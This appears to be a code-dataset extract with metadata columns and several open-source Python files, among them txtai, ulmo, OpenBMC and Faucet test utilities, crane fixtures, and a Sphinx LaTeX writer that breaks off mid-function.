blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cd686afdf02804445d98cb43a8d0cf1e1e594462
|
b7314f9480634b2f2998c8181d4284d2b52ebba1
|
/src/python/txtai/pipeline/image/objects.py
|
0dbaff4e1d523abdcd43376c4f665360260b635e
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
neuml/txtai
|
3ca6fba11126d650ea4f2cf5199011a52ea56e4e
|
789a4555cb60ee9cdfa69afae5a5236d197e2b07
|
refs/heads/master
| 2023-08-31T08:09:31.834178
| 2023-08-29T15:36:23
| 2023-08-29T15:36:23
| 286,301,447
| 4,804
| 387
|
Apache-2.0
| 2023-09-11T17:12:40
| 2020-08-09T19:14:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,726
|
py
|
objects.py
|
"""
Objects module
"""
# Conditional import
try:
from PIL import Image
PIL = True
except ImportError:
PIL = False
from ..hfpipeline import HFPipeline
class Objects(HFPipeline):
"""
Applies object detection models to images. Supports both object detection models and image classification models.
"""
def __init__(self, path=None, quantize=False, gpu=True, model=None, classification=False, threshold=0.9, **kwargs):
if not PIL:
raise ImportError('Objects pipeline is not available - install "pipeline" extra to enable')
super().__init__("image-classification" if classification else "object-detection", path, quantize, gpu, model, **kwargs)
self.classification = classification
self.threshold = threshold
def __call__(self, images, flatten=False, workers=0):
"""
Applies object detection/image classification models to images. Returns a list of (label, score).
This method supports a single image or a list of images. If the input is an image, the return
type is a 1D list of (label, score). If text is a list, a 2D list of (label, score) is
returned with a row per image.
Args:
images: image|list
flatten: flatten output to a list of objects
workers: number of concurrent workers to use for processing data, defaults to None
Returns:
list of (label, score)
"""
# Convert single element to list
values = [images] if not isinstance(images, list) else images
# Open images if file strings
values = [Image.open(image) if isinstance(image, str) else image for image in values]
# Run pipeline
results = (
self.pipeline(values, num_workers=workers)
if self.classification
else self.pipeline(values, threshold=self.threshold, num_workers=workers)
)
# Build list of (id, score)
outputs = []
for result in results:
# Convert to (label, score) tuples
result = [(x["label"], x["score"]) for x in result if x["score"] > self.threshold]
# Sort by score descending
result = sorted(result, key=lambda x: x[1], reverse=True)
# Deduplicate labels
unique = set()
elements = []
for label, score in result:
if label not in unique:
elements.append(label if flatten else (label, score))
unique.add(label)
outputs.append(elements)
# Return single element if single element passed in
return outputs[0] if not isinstance(images, list) else outputs
|
5148719ae13d5f6e9dd9a53c17ae2462182b5bd8
|
a46ccf3496712f85e92e15bac27b9f9df23436a4
|
/notebooks/_solutions/01-introduction-tabular-data17.py
|
8b87f1f5fa72420335a27742e79f4cf7d062a37a
|
[
"BSD-3-Clause"
] |
permissive
|
jorisvandenbossche/DS-python-geospatial
|
a30ef43daa1d8cfd9d5652ab047bd828573bb493
|
cd5d63057a335e0cb157faf12b945ec664da4c10
|
refs/heads/main
| 2022-11-24T09:55:06.552714
| 2022-11-20T22:15:50
| 2022-11-20T22:15:50
| 244,412,214
| 134
| 39
|
BSD-3-Clause
| 2023-09-14T17:10:54
| 2020-03-02T15:57:19
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 63
|
py
|
01-introduction-tabular-data17.py
|
subset = districts[districts['population'] > 50000]
len(subset)
|
948e05bbf880513b5e11d17f4965b2b2e6038808
|
c1291ee7d6d2c702090eaa273b608696e050b138
|
/ulmo/lcra/hydromet/__init__.py
|
24b934d1d127fd1c72acd2099ff6c6a292a1b514
|
[
"BSD-3-Clause"
] |
permissive
|
ulmo-dev/ulmo
|
bd5c33f18582744df1c56c8dbb6bdea73ced1f40
|
63371c33550d4c3fe19a02e615f239d3096fd401
|
refs/heads/master
| 2023-06-09T07:21:44.503674
| 2023-06-02T20:41:46
| 2023-06-02T20:41:46
| 1,579,740
| 134
| 51
|
NOASSERTION
| 2023-06-02T20:41:47
| 2011-04-06T23:00:14
|
HTML
|
UTF-8
|
Python
| false
| false
| 425
|
py
|
__init__.py
|
"""
LCRA Hydromet Data
~~~~~~~~~~~~~~~~~~
Access to hydrologic and climate data in the Colorado River Basin (Texas)
provided by the `Hydromet`_ web site and web service from
the `Lower Colorado River Authority`_.
.. _Lower Colorado River Authority: http://www.lcra.org
.. _Hydromet: http://hydromet.lcra.org
"""
from .core import get_sites_by_type, get_site_data, get_all_sites, get_current_data
|
a151a964fbcb9179e5d5d2e1b9ad3bd73a538391
|
ac2f43c8e0d9649a7f063c59b3dffdfed9fd7ed7
|
/tests2/common/base_mboot_test.py
|
087f2223f8d336601088230999db83bc57a6a4a7
|
[] |
no_license
|
facebook/openbmc
|
bef10604ced226288600f55248b7f1be9945aea4
|
32777c66a8410d767eae15baabf71c61a0bef13c
|
refs/heads/helium
| 2023-08-17T03:13:54.729494
| 2023-08-16T23:24:18
| 2023-08-16T23:24:18
| 31,917,712
| 684
| 331
| null | 2023-07-25T21:19:08
| 2015-03-09T19:18:35
|
C
|
UTF-8
|
Python
| false
| false
| 1,707
|
py
|
base_mboot_test.py
|
#!/usr/bin/env python3
#
# Copyright 2020-present Facebook. All Rights Reserved.
#
# This program file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program in a file named COPYING; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import json
from abc import abstractmethod
from utils.cit_logger import Logger
from utils.shell_util import run_cmd
class BaseMBootTest(object):
def setUp(self):
Logger.start(name=self._testMethodName)
self.check_list = set()
self.set_check_list()
def tearDown(self):
Logger.info("Finished logging for {}".format(self._testMethodName))
@abstractmethod
def set_check_list(self):
pass
def test_mboot(self):
"""
Test all measures
"""
checked_list = set()
cmd = ["/usr/bin/mboot-check", "-jt"]
measures = json.loads(run_cmd(cmd))
for m in measures:
self.assertNotEqual(m["measure"], "NA")
if m["component"] in self.check_list:
self.assertEqual(m["expect"], m["measure"])
checked_list.add(m["component"])
self.assertEqual(checked_list, self.check_list)
|
c49c1c92853ce4ad200d63808ce37dccbec5756f
|
e4f8313d3c91d08e3ab92886a956d96e5a3e21bf
|
/tests/integration/conftest.py
|
dc33687e53061d4325b62ef406e7749573021146
|
[
"MIT"
] |
permissive
|
kiwicom/crane
|
69e883b56c2b8c0221fb31c8f98265e929abb73f
|
7033a7f0a8ebaf5679c87ddde8ef866b23562917
|
refs/heads/master
| 2023-04-07T06:50:05.801158
| 2023-04-04T14:49:24
| 2023-04-04T14:49:24
| 86,802,251
| 105
| 17
|
MIT
| 2022-12-08T04:50:11
| 2017-03-31T09:28:10
|
Python
|
UTF-8
|
Python
| false
| false
| 526
|
py
|
conftest.py
|
import os
import shutil
import git
import pytest
import tempfile
from crane import deployment
@pytest.fixture(autouse=True)
def gitlab_ci_env(monkeypatch):
monkeypatch.setenv("GITLAB_USER_EMAIL", "picky@kiwi.com")
monkeypatch.setenv("CI_PROJECT_PATH", "foo/bar")
monkeypatch.setenv("CI_PROJECT_URL", "https://example.com/foo/bar")
monkeypatch.setenv("CI_JOB_ID", "1234567")
monkeypatch.setenv("CI_REGISTRY_IMAGE", "registry.example.com/foo/bar")
monkeypatch.setenv("CI_ENVIRONMENT_NAME", "a-b/c-d")
|
31d52dd3fad2395ef5dd897c743258eb9fdbd78e
|
cb8eaa782982767464ac0f9f6fb5c24fc0610c7b
|
/clib/mininet_test_util.py
|
c96e989e83a6c601004ac86e0c0238abc3e00b0c
|
[
"Apache-2.0"
] |
permissive
|
faucetsdn/faucet
|
8a62688f369dfecebb23d30f7704799f613323f1
|
33a111e0664a7ac7d98938f7a0a0222a5c99ca7b
|
refs/heads/main
| 2023-08-28T19:16:46.435088
| 2023-08-24T02:04:23
| 2023-08-24T02:04:23
| 43,105,431
| 465
| 158
|
Apache-2.0
| 2023-09-14T06:51:38
| 2015-09-25T02:39:36
|
Python
|
UTF-8
|
Python
| false
| false
| 7,393
|
py
|
mininet_test_util.py
|
#!/usr/bin/env python3
"""Standalone utility functions for Mininet tests."""
import collections
import os
import socket
import subprocess
import time
# pylint: disable=import-error
from mininet.log import error, output
DEVNULL = open(os.devnull, "wb", encoding=None) # pylint: disable=consider-using-with
GETPORT = "GETPORT"
PUTPORTS = "PUTPORTS"
GETSERIAL = "GETSERIAL"
LISTPORTS = "LISTPORTS"
LOCALHOST = "127.0.0.1"
LOCALHOSTV6 = "::1"
FAUCET_DIR = os.getenv("FAUCET_DIR", "../faucet")
RESERVED_FOR_TESTS_PORTS = (179, 5001, 5002, 6633, 6653)
with open(
"/proc/sys/net/netfilter/nf_conntrack_tcp_timeout_time_wait", encoding="utf-8"
) as pf:
MIN_PORT_AGE = max(int(pf.read()) / 2, 10)
def flat_test_name(_id):
"""Return short form test name from TestCase ID."""
return "-".join(_id.split(".")[1:])
def lsof_tcp_listening_cmd(port, ipv, state, terse, pid):
"""Return a command line for lsof for processes with specified TCP state."""
terse_arg = ""
if terse:
terse_arg = "-t"
pid_arg = ""
if pid:
pid_arg = "-p %u" % pid
return "lsof -b -P -n %s %s -sTCP:%s -i %u -a -i tcp:%u" % (
pid_arg,
terse_arg,
state,
ipv,
port,
)
def lsof_udp_listening_cmd(port, terse):
"""Return a command line for lsof for processes with specified TCP state."""
terse_arg = ""
if terse:
terse_arg = "-t"
return "lsof -b -P -n %s -i udp:%u -a" % (terse_arg, port)
def tcp_listening_cmd(port, ipv=4, state="LISTEN", terse=True, pid=None):
"""Call lsof_tcp_listening_cmd() with default args."""
return lsof_tcp_listening_cmd(port, ipv, state, terse, pid)
def udp_listening_cmd(port, terse=True):
"""Call lsof_tcp_listening_cmd() with default args."""
return lsof_udp_listening_cmd(port, terse)
def mininet_dpid(int_dpid):
"""Return stringified hex version, of int DPID for mininet."""
return str("%x" % int(int_dpid))
def str_int_dpid(str_dpid):
"""Return stringified int version, of int or hex DPID from YAML."""
str_dpid = str(str_dpid)
if str_dpid.startswith("0x"):
return str(int(str_dpid, 16))
return str(int(str_dpid))
def receive_sock_line(sock):
"""Receive a \n terminated line from a socket."""
buf = ""
while buf.find("\n") <= -1:
buf += sock.recv(2**10).decode()
return buf.strip()
def tcp_listening(port):
"""Return True if any process listening on a port."""
return (
subprocess.call(
tcp_listening_cmd(port).split(),
stdin=DEVNULL,
stdout=DEVNULL,
stderr=DEVNULL,
close_fds=True,
)
== 0
)
def udp_listening(port):
"""Return True if any process listening on a port."""
return (
subprocess.call(
udp_listening_cmd(port).split(),
stdin=DEVNULL,
stdout=DEVNULL,
stderr=DEVNULL,
close_fds=True,
)
== 0
)
def test_server_request(ports_socket, name, command):
assert name is not None
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(ports_socket)
sock.sendall(("%s,%s\n" % (command, name)).encode())
output("%s %s\n" % (name, command))
buf = receive_sock_line(sock)
responses = [int(i) for i in buf.split("\n")]
sock.close()
if len(responses) == 1:
responses = responses[0]
output("%s %s: %u\n" % (name, command, responses))
return responses
def get_serialno(ports_socket, name):
"""Retrieve serial number from test server."""
return test_server_request(ports_socket, name, GETSERIAL)
def find_free_port(ports_socket, name):
"""Retrieve a free TCP port from test server."""
request_name = "-".join((name, str(os.getpid())))
while True:
port = test_server_request(ports_socket, request_name, GETPORT)
if not tcp_listening(port):
return port
error("port %u is busy, try another" % port)
def find_free_udp_port(ports_socket, name):
request_name = "-".join((name, str(os.getpid())))
while True:
port = test_server_request(ports_socket, request_name, GETPORT)
if not udp_listening(port):
return port
error("port %u is busy, try another" % port)
def return_free_ports(ports_socket, name):
"""Notify test server that all ports under name are released."""
return test_server_request(ports_socket, name, PUTPORTS)
def serve_ports(ports_socket, start_free_ports, min_free_ports):
"""Implement a TCP server to dispense free TCP ports."""
ports_q = collections.deque()
free_ports = set()
port_age = {}
serialno = 0
def get_port():
while True:
free_socket = socket.socket()
free_socket.bind(("", 0))
free_port = free_socket.getsockname()[1]
free_socket.close()
if free_port < 1024:
continue
if free_port in RESERVED_FOR_TESTS_PORTS:
continue
if free_port in free_ports:
continue
break
free_ports.add(free_port)
port_age[free_port] = time.time()
return free_port
def queue_free_ports(min_queue_size):
while len(ports_q) < min_queue_size:
port = get_port()
ports_q.append(port)
port_age[port] = time.time()
queue_free_ports(start_free_ports)
ports_by_name = collections.defaultdict(set)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(ports_socket)
sock.listen(1)
cold_start = True
while True:
connection, _ = sock.accept()
command, name = receive_sock_line(connection).split(",")
response = None
if command == GETSERIAL:
serialno += 1
response = serialno
elif command == PUTPORTS:
ports_returned = 0
for port in ports_by_name[name]:
ports_returned += 1
ports_q.append(port)
port_age[port] = time.time()
del ports_by_name[name]
response = ports_returned
if ports_returned:
cold_start = False
elif command == GETPORT:
while True:
port = ports_q.popleft()
if time.time() - port_age[port] > MIN_PORT_AGE or cold_start:
break
ports_q.append(port)
time.sleep(1)
ports_by_name[name].add(port)
response = port
queue_free_ports(min_free_ports)
elif command == LISTPORTS:
response = list(ports_by_name[name])
if response is not None:
response_str = ""
if isinstance(response, int):
response = [response]
response_str = "".join(["%u\n" % i for i in response])
connection.sendall(response_str.encode()) # pylint: disable=no-member
connection.close()
def timeout_cmd(cmd, timeout):
"""Return a command line prefaced with a timeout wrappers and stdout/err unbuffered."""
return "timeout -sKILL %us stdbuf -o0 -e0 %s" % (timeout, cmd)
def timeout_soft_cmd(cmd, timeout):
"""Same as timeout_cmd buf using SIGTERM on timeout."""
return "timeout %us stdbuf -o0 -e0 %s" % (timeout, cmd)
|
74c9202d3f478efedf88fed19a016b6a421714cf
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/universal/__init__.py
|
9a814402b9c3e95e8490df1c07216ca5b947f3c9
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 41
|
py
|
__init__.py
|
"""Tests for the universal component."""
|
210e9e154e203320b8e7a0522df3164e9f6fe03f
|
8de79ab1818c535dcd8ad6e0c92b5c9642ffb82a
|
/sphinx/writers/latex.py
|
89b349aee59859e624d9a99bfb55f8c194b3f6d9
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
sphinx-doc/sphinx
|
632d75bfc7bef14904f3d847e6de6d37594a13a5
|
eab54533a56119c5badd5aac647c595a9adae720
|
refs/heads/master
| 2023-08-16T18:21:54.073511
| 2023-08-15T17:36:47
| 2023-08-15T17:36:47
| 28,710,753
| 6,138
| 2,587
|
NOASSERTION
| 2023-09-14T14:22:28
| 2015-01-02T10:53:28
|
Python
|
UTF-8
|
Python
| false
| false
| 90,889
|
py
|
latex.py
|
"""Custom docutils writer for LaTeX.
Much of this code is adapted from Dave Kuhlman's "docpy" writer from his
docutils sandbox.
"""
from __future__ import annotations
import re
from collections import defaultdict
from collections.abc import Iterable
from os import path
from typing import TYPE_CHECKING, Any, cast
from docutils import nodes, writers
from sphinx import addnodes, highlighting
from sphinx.domains.std import StandardDomain
from sphinx.errors import SphinxError
from sphinx.locale import _, __, admonitionlabels
from sphinx.util import logging, texescape
from sphinx.util.docutils import SphinxTranslator
from sphinx.util.index_entries import split_index_msg
from sphinx.util.nodes import clean_astext, get_prev_node
from sphinx.util.template import LaTeXRenderer
from sphinx.util.texescape import tex_replace_map
try:
from docutils.utils.roman import toRoman
except ImportError:
# In Debian/Ubuntu, roman package is provided as roman, not as docutils.utils.roman
from roman import toRoman # type: ignore[no-redef]
if TYPE_CHECKING:
from docutils.nodes import Element, Node, Text
from sphinx.builders.latex import LaTeXBuilder
from sphinx.builders.latex.theming import Theme
from sphinx.domains import IndexEntry
logger = logging.getLogger(__name__)
MAX_CITATION_LABEL_LENGTH = 8
LATEXSECTIONNAMES = ["part", "chapter", "section", "subsection",
"subsubsection", "paragraph", "subparagraph"]
ENUMERATE_LIST_STYLE = defaultdict(lambda: r'\arabic',
{
'arabic': r'\arabic',
'loweralpha': r'\alph',
'upperalpha': r'\Alph',
'lowerroman': r'\roman',
'upperroman': r'\Roman',
})
CR = '\n'
BLANKLINE = '\n\n'
EXTRA_RE = re.compile(r'^(.*\S)\s+\(([^()]*)\)\s*$')
class collected_footnote(nodes.footnote):
"""Footnotes that are collected are assigned this class."""
class UnsupportedError(SphinxError):
category = 'Markup is unsupported in LaTeX'
class LaTeXWriter(writers.Writer):
supported = ('sphinxlatex',)
settings_spec = ('LaTeX writer options', '', (
('Document name', ['--docname'], {'default': ''}),
('Document class', ['--docclass'], {'default': 'manual'}),
('Author', ['--author'], {'default': ''}),
))
settings_defaults: dict[str, Any] = {}
theme: Theme
def __init__(self, builder: LaTeXBuilder) -> None:
super().__init__()
self.builder = builder
def translate(self) -> None:
visitor = self.builder.create_translator(self.document, self.builder, self.theme)
self.document.walkabout(visitor)
self.output = cast(LaTeXTranslator, visitor).astext()
# Helper classes
class Table:
"""A table data"""
def __init__(self, node: Element) -> None:
self.header: list[str] = []
self.body: list[str] = []
self.align = node.get('align', 'default')
self.classes: list[str] = node.get('classes', [])
self.styles: list[str] = []
if 'standard' in self.classes:
self.styles.append('standard')
elif 'borderless' in self.classes:
self.styles.append('borderless')
elif 'booktabs' in self.classes:
self.styles.append('booktabs')
if 'nocolorrows' in self.classes:
self.styles.append('nocolorrows')
elif 'colorrows' in self.classes:
self.styles.append('colorrows')
self.colcount = 0
self.colspec: str = ''
if 'booktabs' in self.styles or 'borderless' in self.styles:
self.colsep: str | None = ''
elif 'standard' in self.styles:
self.colsep = '|'
else:
self.colsep = None
self.colwidths: list[int] = []
self.has_problematic = False
self.has_oldproblematic = False
self.has_verbatim = False
self.caption: list[str] = []
self.stubs: list[int] = []
# current position
self.col = 0
self.row = 0
# A dict mapping a table location to a cell_id (cell = rectangular area)
self.cells: dict[tuple[int, int], int] = defaultdict(int)
self.cell_id = 0 # last assigned cell_id
def is_longtable(self) -> bool:
"""True if and only if table uses longtable environment."""
return self.row > 30 or 'longtable' in self.classes
def get_table_type(self) -> str:
"""Returns the LaTeX environment name for the table.
The class currently supports:
* longtable
* tabular
* tabulary
"""
if self.is_longtable():
return 'longtable'
elif self.has_verbatim:
return 'tabular'
elif self.colspec:
return 'tabulary'
elif self.has_problematic or (self.colwidths and 'colwidths-given' in self.classes):
return 'tabular'
else:
return 'tabulary'
def get_colspec(self) -> str:
"""Returns a column spec of table.
This is what LaTeX calls the 'preamble argument' of the used table environment.
.. note::
The ``\\X`` and ``T`` column type specifiers are defined in
``sphinxlatextables.sty``.
"""
if self.colspec:
return self.colspec
_colsep = self.colsep
assert _colsep is not None
if self.colwidths and 'colwidths-given' in self.classes:
total = sum(self.colwidths)
colspecs = [r'\X{%d}{%d}' % (width, total) for width in self.colwidths]
return f'{{{_colsep}{_colsep.join(colspecs)}{_colsep}}}' + CR
elif self.has_problematic:
return r'{%s*{%d}{\X{1}{%d}%s}}' % (_colsep, self.colcount,
self.colcount, _colsep) + CR
elif self.get_table_type() == 'tabulary':
# sphinx.sty sets T to be J by default.
return '{' + _colsep + (('T' + _colsep) * self.colcount) + '}' + CR
elif self.has_oldproblematic:
return r'{%s*{%d}{\X{1}{%d}%s}}' % (_colsep, self.colcount,
self.colcount, _colsep) + CR
else:
return '{' + _colsep + (('l' + _colsep) * self.colcount) + '}' + CR
def add_cell(self, height: int, width: int) -> None:
"""Adds a new cell to a table.
It will be located at current position: (``self.row``, ``self.col``).
"""
self.cell_id += 1
for col in range(width):
for row in range(height):
assert self.cells[(self.row + row, self.col + col)] == 0
self.cells[(self.row + row, self.col + col)] = self.cell_id
def cell(
self, row: int | None = None, col: int | None = None,
) -> TableCell | None:
"""Returns a cell object (i.e. rectangular area) containing given position.
If no option arguments: ``row`` or ``col`` are given, the current position;
``self.row`` and ``self.col`` are used to get a cell object by default.
"""
try:
if row is None:
row = self.row
if col is None:
col = self.col
return TableCell(self, row, col)
except IndexError:
return None
class TableCell:
"""Data of a cell in a table."""
def __init__(self, table: Table, row: int, col: int) -> None:
if table.cells[(row, col)] == 0:
raise IndexError
self.table = table
self.cell_id = table.cells[(row, col)]
self.row = row
self.col = col
# adjust position for multirow/multicol cell
while table.cells[(self.row - 1, self.col)] == self.cell_id:
self.row -= 1
while table.cells[(self.row, self.col - 1)] == self.cell_id:
self.col -= 1
@property
def width(self) -> int:
"""Returns the cell width."""
width = 0
while self.table.cells[(self.row, self.col + width)] == self.cell_id:
width += 1
return width
@property
def height(self) -> int:
"""Returns the cell height."""
height = 0
while self.table.cells[(self.row + height, self.col)] == self.cell_id:
height += 1
return height
def escape_abbr(text: str) -> str:
"""Adjust spacing after abbreviations."""
return re.sub(r'\.(?=\s|$)', r'.\@', text)
def rstdim_to_latexdim(width_str: str, scale: int = 100) -> str:
"""Convert `width_str` with rst length to LaTeX length."""
match = re.match(r'^(\d*\.?\d*)\s*(\S*)$', width_str)
if not match:
raise ValueError
res = width_str
amount, unit = match.groups()[:2]
if scale == 100:
float(amount) # validate amount is float
if unit in ('', "px"):
res = r"%s\sphinxpxdimen" % amount
elif unit == 'pt':
res = '%sbp' % amount # convert to 'bp'
elif unit == "%":
res = r"%.3f\linewidth" % (float(amount) / 100.0)
else:
amount_float = float(amount) * scale / 100.0
if unit in ('', "px"):
res = r"%.5f\sphinxpxdimen" % amount_float
elif unit == 'pt':
res = '%.5fbp' % amount_float
elif unit == "%":
res = r"%.5f\linewidth" % (amount_float / 100.0)
else:
res = f"{amount_float:.5f}{unit}"
return res
class LaTeXTranslator(SphinxTranslator):
builder: LaTeXBuilder
secnumdepth = 2 # legacy sphinxhowto.cls uses this, whereas article.cls
# default is originally 3. For book/report, 2 is already LaTeX default.
ignore_missing_images = False
def __init__(self, document: nodes.document, builder: LaTeXBuilder,
theme: Theme) -> None:
super().__init__(document, builder)
self.body: list[str] = []
self.theme = theme
# flags
self.in_title = 0
self.in_production_list = 0
self.in_footnote = 0
self.in_caption = 0
self.in_term = 0
self.needs_linetrimming = 0
self.in_minipage = 0
self.no_latex_floats = 0
self.first_document = 1
self.this_is_the_title = 1
self.literal_whitespace = 0
self.in_parsed_literal = 0
self.compact_list = 0
self.first_param = 0
self.in_desc_signature = False
sphinxpkgoptions = []
# sort out some elements
self.elements = self.builder.context.copy()
# initial section names
self.sectionnames = LATEXSECTIONNAMES[:]
if self.theme.toplevel_sectioning == 'section':
self.sectionnames.remove('chapter')
# determine top section level
self.top_sectionlevel = 1
if self.config.latex_toplevel_sectioning:
try:
self.top_sectionlevel = \
self.sectionnames.index(self.config.latex_toplevel_sectioning)
except ValueError:
logger.warning(__('unknown %r toplevel_sectioning for class %r') %
(self.config.latex_toplevel_sectioning, self.theme.docclass))
if self.config.numfig:
self.numfig_secnum_depth = self.config.numfig_secnum_depth
if self.numfig_secnum_depth > 0: # default is 1
# numfig_secnum_depth as passed to sphinx.sty indices same names as in
# LATEXSECTIONNAMES but with -1 for part, 0 for chapter, 1 for section...
if len(self.sectionnames) < len(LATEXSECTIONNAMES) and \
self.top_sectionlevel > 0:
self.numfig_secnum_depth += self.top_sectionlevel
else:
self.numfig_secnum_depth += self.top_sectionlevel - 1
# this (minus one) will serve as minimum to LaTeX's secnumdepth
self.numfig_secnum_depth = min(self.numfig_secnum_depth,
len(LATEXSECTIONNAMES) - 1)
# if passed key value is < 1 LaTeX will act as if 0; see sphinx.sty
sphinxpkgoptions.append('numfigreset=%s' % self.numfig_secnum_depth)
else:
sphinxpkgoptions.append('nonumfigreset')
if self.config.numfig and self.config.math_numfig:
sphinxpkgoptions.append('mathnumfig')
if (self.config.language not in {'en', 'ja'} and
'fncychap' not in self.config.latex_elements):
# use Sonny style if any language specified (except English)
self.elements['fncychap'] = (r'\usepackage[Sonny]{fncychap}' + CR +
r'\ChNameVar{\Large\normalfont\sffamily}' + CR +
r'\ChTitleVar{\Large\normalfont\sffamily}')
self.babel = self.builder.babel
if not self.babel.is_supported_language():
# emit warning if specified language is invalid
# (only emitting, nothing changed to processing)
logger.warning(__('no Babel option known for language %r'),
self.config.language)
minsecnumdepth = self.secnumdepth # 2 from legacy sphinx manual/howto
if self.document.get('tocdepth'):
# reduce tocdepth if `part` or `chapter` is used for top_sectionlevel
# tocdepth = -1: show only parts
# tocdepth = 0: show parts and chapters
# tocdepth = 1: show parts, chapters and sections
# tocdepth = 2: show parts, chapters, sections and subsections
# ...
tocdepth = self.document.get('tocdepth', 999) + self.top_sectionlevel - 2
if len(self.sectionnames) < len(LATEXSECTIONNAMES) and \
self.top_sectionlevel > 0:
tocdepth += 1 # because top_sectionlevel is shifted by -1
if tocdepth > len(LATEXSECTIONNAMES) - 2: # default is 5 <-> subparagraph
logger.warning(__('too large :maxdepth:, ignored.'))
tocdepth = len(LATEXSECTIONNAMES) - 2
self.elements['tocdepth'] = r'\setcounter{tocdepth}{%d}' % tocdepth
minsecnumdepth = max(minsecnumdepth, tocdepth)
if self.config.numfig and (self.config.numfig_secnum_depth > 0):
minsecnumdepth = max(minsecnumdepth, self.numfig_secnum_depth - 1)
if minsecnumdepth > self.secnumdepth:
self.elements['secnumdepth'] = r'\setcounter{secnumdepth}{%d}' %\
minsecnumdepth
contentsname = document.get('contentsname')
if contentsname:
self.elements['contentsname'] = self.babel_renewcommand(r'\contentsname',
contentsname)
if self.elements['maxlistdepth']:
sphinxpkgoptions.append('maxlistdepth=%s' % self.elements['maxlistdepth'])
if sphinxpkgoptions:
self.elements['sphinxpkgoptions'] = '[,%s]' % ','.join(sphinxpkgoptions)
if self.elements['sphinxsetup']:
self.elements['sphinxsetup'] = (r'\sphinxsetup{%s}' % self.elements['sphinxsetup'])
if self.elements['extraclassoptions']:
self.elements['classoptions'] += ',' + \
self.elements['extraclassoptions']
self.highlighter = highlighting.PygmentsBridge('latex', self.config.pygments_style,
latex_engine=self.config.latex_engine)
self.context: list[Any] = []
self.descstack: list[str] = []
self.tables: list[Table] = []
self.next_table_colspec: str | None = None
self.bodystack: list[list[str]] = []
self.footnote_restricted: Element | None = None
self.pending_footnotes: list[nodes.footnote_reference] = []
self.curfilestack: list[str] = []
self.handled_abbrs: set[str] = set()
def pushbody(self, newbody: list[str]) -> None:
self.bodystack.append(self.body)
self.body = newbody
def popbody(self) -> list[str]:
body = self.body
self.body = self.bodystack.pop()
return body
def astext(self) -> str:
self.elements.update({
'body': ''.join(self.body),
'indices': self.generate_indices(),
})
return self.render('latex.tex_t', self.elements)
def hypertarget(self, id: str, withdoc: bool = True, anchor: bool = True) -> str:
if withdoc:
id = self.curfilestack[-1] + ':' + id
return (r'\phantomsection' if anchor else '') + r'\label{%s}' % self.idescape(id)
def hypertarget_to(self, node: Element, anchor: bool = False) -> str:
labels = ''.join(self.hypertarget(node_id, anchor=False) for node_id in node['ids'])
if anchor:
return r'\phantomsection' + labels
else:
return labels
def hyperlink(self, id: str) -> str:
return r'{\hyperref[%s]{' % self.idescape(id)
def hyperpageref(self, id: str) -> str:
return r'\autopageref*{%s}' % self.idescape(id)
def escape(self, s: str) -> str:
return texescape.escape(s, self.config.latex_engine)
def idescape(self, id: str) -> str:
return r'\detokenize{%s}' % str(id).translate(tex_replace_map).\
encode('ascii', 'backslashreplace').decode('ascii').\
replace('\\', '_')
def babel_renewcommand(self, command: str, definition: str) -> str:
if self.elements['multilingual']:
prefix = r'\addto\captions%s{' % self.babel.get_language()
suffix = '}'
else: # babel is disabled (mainly for Japanese environment)
prefix = ''
suffix = ''
return fr'{prefix}\renewcommand{{{command}}}{{{definition}}}{suffix}' + CR
def generate_indices(self) -> str:
def generate(content: list[tuple[str, list[IndexEntry]]], collapsed: bool) -> None:
ret.append(r'\begin{sphinxtheindex}' + CR)
ret.append(r'\let\bigletter\sphinxstyleindexlettergroup' + CR)
for i, (letter, entries) in enumerate(content):
if i > 0:
ret.append(r'\indexspace' + CR)
ret.append(r'\bigletter{%s}' % self.escape(letter) + CR)
for entry in entries:
if not entry[3]:
continue
ret.append(r'\item\relax\sphinxstyleindexentry{%s}' %
self.encode(entry[0]))
if entry[4]:
# add "extra" info
ret.append(r'\sphinxstyleindexextra{%s}' % self.encode(entry[4]))
